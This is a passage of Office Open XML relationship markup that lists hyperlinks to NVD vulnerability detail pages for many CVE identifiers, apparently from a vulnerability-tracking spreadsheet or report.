TargetMode="External" Id="rId2154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85161" TargetMode="External" Id="rId2155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85577" TargetMode="External" Id="rId2156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85579" TargetMode="External" Id="rId2157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85587" TargetMode="External" Id="rId2158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85589" TargetMode="External" Id="rId2159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85611" TargetMode="External" Id="rId2160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86080" TargetMode="External" Id="rId2161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86100" TargetMode="External" Id="rId2162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86115" TargetMode="External" Id="rId2163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86120" TargetMode="External" Id="rId2164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86178" TargetMode="External" Id="rId2165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86191" TargetMode="External" Id="rId2166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86205" TargetMode="External" Id="rId2167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86714" TargetMode="External" Id="rId2168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86719" TargetMode="External" Id="rId2169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86737" TargetMode="External" Id="rId2170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85454" TargetMode="External" Id="rId2171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11891" TargetMode="External" Id="rId2172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12387" TargetMode="External" Id="rId2173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33387" TargetMode="External" Id="rId2174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33920" TargetMode="External" Id="rId2175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71503" TargetMode="External" Id="rId2176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73317" TargetMode="External" Id="rId2177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73318" TargetMode="External" Id="rId2178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId2179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73320" TargetMode="External" Id="rId2180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73524" TargetMode="External" Id="rId2181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82024" TargetMode="External" Id="rId2182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82881" TargetMode="External" Id="rId2183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84386" TargetMode="External" Id="rId2184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84477" TargetMode="External" Id="rId2185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85599" TargetMode="External" Id="rId2186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85600" TargetMode="External" Id="rId2187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85781" TargetMode="External" Id="rId2188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86516" TargetMode="External" Id="rId2189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18238" TargetMode="External" Id="rId2190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4361" TargetMode="External" Id="rId2191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72976" TargetMode="External" Id="rId2192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78635" TargetMode="External" Id="rId2193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79904" TargetMode="External" Id="rId2194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86735" TargetMode="External" Id="rId2195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16693" TargetMode="External" Id="rId2196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22575" TargetMode="External" Id="rId2197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53756" TargetMode="External" Id="rId2198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68785" TargetMode="External" Id="rId2199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78624" TargetMode="External" Id="rId2200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84901" TargetMode="External" Id="rId2201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86085" TargetMode="External" Id="rId2202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86993" TargetMode="External" Id="rId2203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-48006" TargetMode="External" Id="rId2204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18986" TargetMode="External" Id="rId2205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19862" TargetMode="External" Id="rId2206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69474" TargetMode="External" Id="rId2207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69615" TargetMode="External" Id="rId2208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78560" TargetMode="External" Id="rId2209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80437" TargetMode="External" Id="rId2210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80439" TargetMode="External" Id="rId2211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84188" TargetMode="External" Id="rId2212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85541" TargetMode="External" Id="rId2213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86257" TargetMode="External" Id="rId2214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18567" TargetMode="External" Id="rId2215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19861" TargetMode="External" Id="rId2216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68849" TargetMode="External" Id="rId2217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68891" TargetMode="External" Id="rId2218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69316" TargetMode="External" Id="rId2219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69425" TargetMode="External" Id="rId2220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69483" TargetMode="External" Id="rId2221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69771" TargetMode="External" Id="rId2222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69792" TargetMode="External" Id="rId2223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69832" TargetMode="External" Id="rId2224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69853" TargetMode="External" Id="rId2225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69895" TargetMode="External" Id="rId2226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72931" TargetMode="External" Id="rId2227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69381" TargetMode="External" Id="rId2228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69548" TargetMode="External" Id="rId2229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76959" TargetMode="External" Id="rId2230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77353" TargetMode="External" Id="rId2231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId2232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78508" TargetMode="External" Id="rId2233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78971" TargetMode="External" Id="rId2234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0001" TargetMode="External" Id="rId2235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18073" TargetMode="External" Id="rId2236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49509" TargetMode="External" Id="rId2237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54179" TargetMode="External" Id="rId2238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69713" TargetMode="External" Id="rId2239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId2240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13159" TargetMode="External" Id="rId2241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14466" TargetMode="External" Id="rId2242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15550" TargetMode="External" Id="rId2243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18313" TargetMode="External" Id="rId2244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19043" TargetMode="External" Id="rId2245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19081" TargetMode="External" Id="rId2246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28627" TargetMode="External" Id="rId2247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45527" TargetMode="External" Id="rId2248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50198" TargetMode="External" Id="rId2249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50199" TargetMode="External" Id="rId2250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53638" TargetMode="External" Id="rId2251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55547" TargetMode="External" Id="rId2252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55566" TargetMode="External" Id="rId2253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73019" TargetMode="External" Id="rId2254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75018" TargetMode="External" Id="rId2255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId2256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId2257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId2258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77352" TargetMode="External" Id="rId2259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId2260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId2261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78593" TargetMode="External" Id="rId2262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78595" TargetMode="External" Id="rId2263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78596" TargetMode="External" Id="rId2264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79588" TargetMode="External" Id="rId2265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79603" TargetMode="External" Id="rId2266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81423" TargetMode="External" Id="rId2267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82298" TargetMode="External" Id="rId2268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82309" TargetMode="External" Id="rId2269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83628" TargetMode="External" Id="rId2270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86176" TargetMode="External" Id="rId2271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86736" TargetMode="External" Id="rId2272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86853" TargetMode="External" Id="rId2273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86994" TargetMode="External" Id="rId2274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86995" TargetMode="External" Id="rId2275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9033" TargetMode="External" Id="rId2276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16647" TargetMode="External" Id="rId2277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82186" TargetMode="External" Id="rId2278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83543" TargetMode="External" Id="rId2279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12285" TargetMode="External" Id="rId2280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75421" TargetMode="External" Id="rId2281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80159" TargetMode="External" Id="rId2282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55785" TargetMode="External" Id="rId2283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81348" TargetMode="External" Id="rId2284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15694" TargetMode="External" Id="rId2285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49895" TargetMode="External" Id="rId2286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId2287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75726" TargetMode="External" Id="rId2288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId2289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId2290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77351" TargetMode="External" Id="rId2291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0054" TargetMode="External" Id="rId2292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28582" TargetMode="External" Id="rId2293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28622" TargetMode="External" Id="rId2294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28623" TargetMode="External" Id="rId2295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28630" TargetMode="External" Id="rId2296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28638" TargetMode="External" Id="rId2297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28660" TargetMode="External" Id="rId2298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28671" TargetMode="External" Id="rId2299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45519" TargetMode="External" Id="rId2300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45521" TargetMode="External" Id="rId2301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45525" TargetMode="External" Id="rId2302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55290" TargetMode="External" Id="rId2303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86564" TargetMode="External" Id="rId2304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28652" TargetMode="External" Id="rId2305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48707" TargetMode="External" Id="rId2306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84066" TargetMode="External" Id="rId2307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId2308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85052" TargetMode="External" Id="rId2309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86670" TargetMode="External" Id="rId2310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15693" TargetMode="External" Id="rId2311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78150" TargetMode="External" Id="rId2312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId2313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84745" TargetMode="External" Id="rId2314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84926" TargetMode="External" Id="rId2315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84927" TargetMode="External" Id="rId2316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18743" TargetMode="External" Id="rId2317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45197" TargetMode="External" Id="rId2318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 